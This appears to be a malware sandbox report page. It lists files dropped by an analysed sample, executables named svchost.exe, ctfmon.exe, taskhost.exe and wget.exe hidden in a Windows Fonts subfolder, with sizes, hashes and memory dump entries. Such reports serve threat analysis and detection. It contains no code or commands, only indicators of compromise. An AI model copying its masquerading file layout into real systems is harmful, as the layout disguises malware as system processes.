ca8df30baf3a11823d0f415433c0dbf10694ffdad935189136327bd02ba150786db410dbaf4e223e0d1988b13323625675664b9642163cfddff26d669fd09a22

Download Submit
C:\Windows\Fonts\Mysql\svchost.exe

Filesize
256KB

MD5
7afcf45907f225e3e3cfeece3bbcd410

SHA1
9747e4c11bcf0393e1d1a2ac4b7c43af590da0bc

SHA256
c5a346bd16c246db669605c70a547204313c0fa2325332a3d8427a4449e5b40e

SHA512
ce091728b83bc4edb57dfbbeec4ce0de0220de82965ae3b2d6f71ce822be60a81c28ef7c605a8411c1113ee23513e06670029ec3b7af09ab0682b0358064c44f

Download Submit
C:\Windows\Fonts\Mysql\svchost.exe

Filesize
220KB

MD5
d19622ae565744bab6d9a7fc12cce443

SHA1
5ff938b91688cdc7bdb3aa1c80e5267883c343bf

SHA256
96cebf39c9a9fb56c95b5899f1620ad73282a620ce0bea74e27a4858403ce9e4

SHA512
5d089505674958671ffb186ccc849ad1346bf9bcf3fe992e5ee03d09dde21e9ae90abf32e634ad538ffb7ec05823aa95320fb1f4155f68d97ea64a9394a8c652

Download Submit
C:\Windows\Fonts\Mysql\svchost.exe

Filesize
232KB

MD5
dd8e72dc6e4366e47ac3c71d495cbb6b

SHA1
31ac29ee08cb214e0cfbdcb80245d08e58b4a3cd

SHA256
8f05f88b881d51ffc301075b02120e54a1d0065939ef0ac12329139b89671fd6

SHA512
7d1f123266ee65dd2100116c3e814d22137595f5f3bf846cdf2bcc47c35c81b424caa3afafc48e19d6f92f652969aae38bef56adb855c8a95c765ce13362b5d4

Download Submit
C:\Windows\Fonts\Mysql\svchost.exe

Filesize
150KB

MD5
7904a1add3defbd2891625feec9b06ec

SHA1
bff4d3ad5db4fd0b444d7f53bb8e18c8c1d0caa9

SHA256
a8b2417f30ebc882d5e88e5b473913dd798a7d701c98de5fcdfad1d29c7382dd

SHA512
686f002e6460d09be7c91cc1a9f943fc9ba3aa98a6a166ee0e354b7e2ae86c414adae7ce470b1f0e0166b962916ba71b577d6e17568f5c27b7ff5911ae47a200

Download Submit
C:\Windows\Fonts\Mysql\svchost.exe

Filesize
45KB

MD5
307c298cb7695f6ccca3025493aaccec

SHA1
15af39299ee2d8cfc8d246a70ae3fefd42e47257

SHA256
9c6a83e8c38dd3f120d6165c09b8847f1da98d352919498d365ede6c97140ca7

SHA512
e341819c09ad65d92538ee93c6717ddf2ac9d8a7a68192a82ce5962151ff62cd4da4d4a11b12f64a97e4b7257e30f92804a70ce6fa437466373d51030c823513

Download Submit
C:\Windows\Fonts\Mysql\svchost.exe

Filesize
104KB

MD5
4fc4ca6811e3a85b4f9c0d13cc90cc98

SHA1
ebd0b28d689cc18c2aa47125c4848c7b8c72c0b7

SHA256
11990417f0016c6018b9f010e941ecf39fc7e08d09d6b799649c743cecaee3e6

SHA512
a399538b23985f5f1df5a834111d64ddee535fcdee05b1e2733ed503f7f64369a63cdc955c717fd24610497685716d355bb3158cafd53125ad53472ca2a372db

Download Submit
C:\Windows\Fonts\Mysql\svchost.exe

Filesize
98KB

MD5
018765099c9e56667a9cde4ac895b9ae

SHA1
287ec71429242c5c372ab81caae7f0d0da728f2b

SHA256
026cf2ecb3ed76f9d52cba8cfff956e95222592384177c0e64b524a7006c03bc

SHA512
2522049620a29b246e1e7034424aebffe47e76699083e1447fed532312011e61771f2641d4eeb73b8ea00bd947e4dc759b8d160e15d3ed0fb08473ca2da914a3

Download Submit
C:\Windows\Fonts\Mysql\svchost.exe

Filesize
40KB

MD5
c07a7f4ca59f6b886a4fd8759c1ccba9

SHA1
fca4e0353c1fba0023bdcc99b93c10adebfbbe26

SHA256
9b6a35d9610d2a293a2aaa4ccb553f9acc4704eac55c36fd1c8c3f900de8fbd1

SHA512
af6ccd6c15220e381ade8886eae85310a171220ecf51fd4e87cd12d5604bffc580e8124b2a17bfd000c43e3be486a6146d74552f4e5678222ea7d410203000ee

Download Submit
C:\Windows\Fonts\Mysql\taskhost.exe

Filesize
14KB

MD5
c097fd043d3cbabcada0878505c7afa5

SHA1
966a60028a3a24268c049ffadbe1a07b83de24ce

SHA256
1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc

SHA512
0837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0

Download Submit
C:\Windows\Fonts\Mysql\temp.txt

Filesize
12B

MD5
8cf4dec152a9d79a3d62202b886eda9b

SHA1
0c1b3d3d02c0b655aa3526a58486b84872f18cc2

SHA256
c30e56c9c8fe30ffa4a4ff712cf2fa1808ee82ca258cd4c8ebefcc82250b6c01

SHA512
a5a65f0604f8553d0be07bd5214db52d3f167e7511d29cb64e3fa9d8c510cc79976ff2a5acb9b8c09b666f306ac8e4ad389f9a2de3ca46d57b1e91060a4c50fd

Download Submit
C:\Windows\Fonts\Mysql\wget.exe

Filesize
392KB

MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
\Users\Admin\AppData\Local\Temp\xsfxdel~.exe

Filesize
37KB

MD5
a48b642733b4ed0b2f63c726bea5710f

SHA1
f383f6eb661b6aea3da2f4f2b21b2cbc40ced2a2

SHA256
58361275c9ce4b07a6ee13ddc83f80e88571ea9d4e1aedc476f7d613938b47a6

SHA512
3f43721db1ec77ff2c31e6269bed3bd6e6c0d7577cfcfe913d771da19154819e6868d995f29830623ec568b666d17639b1dd3f2e0e6bf2a21ab4b43f967a9ef6

Download Submit
\Windows\Fonts\Mysql\ctfmon.exe

Filesize
1.3MB

MD5
d823b8d5a5fdc3fc30cbbc76ffadcafc

SHA1
005c3d8ca2bb748cb989c43d23f15dc343c78a07

SHA256
cdb648a2f50229bc3cece2a260bb147c138e61600b22a514fe70f4460caf6a8a

SHA512
9a22c0a337ed7b0a234d309d61704fd373256301e8d427f60ef390c95ec8aff5d6b27003702351b0e24bca1fdbd1b9faf89a18d25ca6c26eacb8d3ed5e419351

Download Submit
\Windows\Fonts\Mysql\ctfmon.exe

Filesize
990KB

MD5
526a0c8bb73b0d62e5409c8220a59fe1

SHA1
da657600062345967dbdd19d94870742b8a7615d

SHA256
4a7bb15f18daf41cacdb167056b8addc355c7c5c216a48c8108561bb911056c3

SHA512
10c3e9ddfc2a5505f90d4a9f0e25be35fb9fe2a20dcaefd98fff3590baa2c2ceb96299f1b25031691698ae6a9fffbf098944e10a76d747ea28e68fc1d09f1e41

Download Submit
\Windows\Fonts\Mysql\svchost.exe

Filesize
153KB

MD5
33d1519b1e46caa1586b03e038ca70ed

SHA1
f3c888dc27a29bbf05e7ef92314665cd296acd91

SHA256
8aa1eff9ce3a86c993837b631f2062ac02c4cb5ab0d660f6b2e3ad4fbe204f18

SHA512
ff8c0bc40fefbd3220ffe31a1d0d1fa58c38dab4377f6c0bfe04201ab1a6c7b325c6718a1c82d56d42889023aa1d1aa72145a6119a2db958cc678933f52e5b13

Download Submit
\Windows\Fonts\Mysql\svchost.exe

Filesize
160KB

MD5
d1eea115c405eb795aee7a295e1b0fde

SHA1
300a8664616d2cc9739d1b6657d1fb0f0e5773e4

SHA256
cd63d882cc1ccffb0d976041de69261796c129f560a7ddfdc905d8a0069c5dd8

SHA512
b86a45313e935f2799cb3e822e96441ad9e0782706271683c39fd6d27268a87253f5b7aa5c6cce29fea7ca461029514331d33b04dded35c69e17b3eb92efdf1d

Download Submit
\Windows\Fonts\Mysql\wget.exe

Filesize
287KB

MD5
623b7e15516f4896e515be2a81e26cbf

SHA1
4b6fc7fb2f36b728c70a19a6be897b327dcc358d

SHA256
ff9b58168b2f098119e035a6868f20d74915eb4c9fb55a3b796f6d90071d14b5

SHA512
f2df365115eace102ff4bc07c20ebef843bad0e5fd17d543ac8ee9c2ec8f4e26ccd3c8b4dc8f050257bec8062f33b9d9ef83991de9de761bdacdda841e203df4

Download Submit
memory/1380-115-0x00000000000C0000-0x00000000000CE000-memory.dmp

Filesize
56KB

Download
memory/1380-117-0x00000000000C0000-0x00000000000CE000-memory.dmp

Filesize
56KB

Download
memory/1380-121-0x0000000000CB0000-0x0000000000D9F000-memory.dmp

Filesize
956KB

Download
memory/1380-107-0x0000000000CB0000-0x0000000000D9F000-memory.dmp

Filesize
956KB

Download
memory/1808-84-0x0000000000400000-0x0000000000E2E000-memory.dmp

Filesize
10.2MB

Download
memory/1808-21-0x0000000003290000-0x0000000003A39000-memory.dmp

Filesize
7.7MB

Download
memory/1808-20-0x0000000003290000-0x0000000003A39000-memory.dmp

Filesize
7.7MB

Download
memory/2564-85-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/2688-23-0x0000000000400000-0x0000000000BA9000-memory.dmp

Filesize
7.7MB

Download
memory/2688-75-0x0000000000400000-0x0000000000BA9000-memory.dmp

Filesize
7.7MB

Download
memory/2688-22-0x0000000000400000-0x0000000000BA9000-memory.dmp

Filesize
7.7MB

Download
memory/2768-110-0x0000000000400000-0x00000000004EF000-memory.dmp

Filesize
956KB

Download
memory/2768-108-0x0000000000400000-0x00000000004EF000-memory.dmp

Filesize
956KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads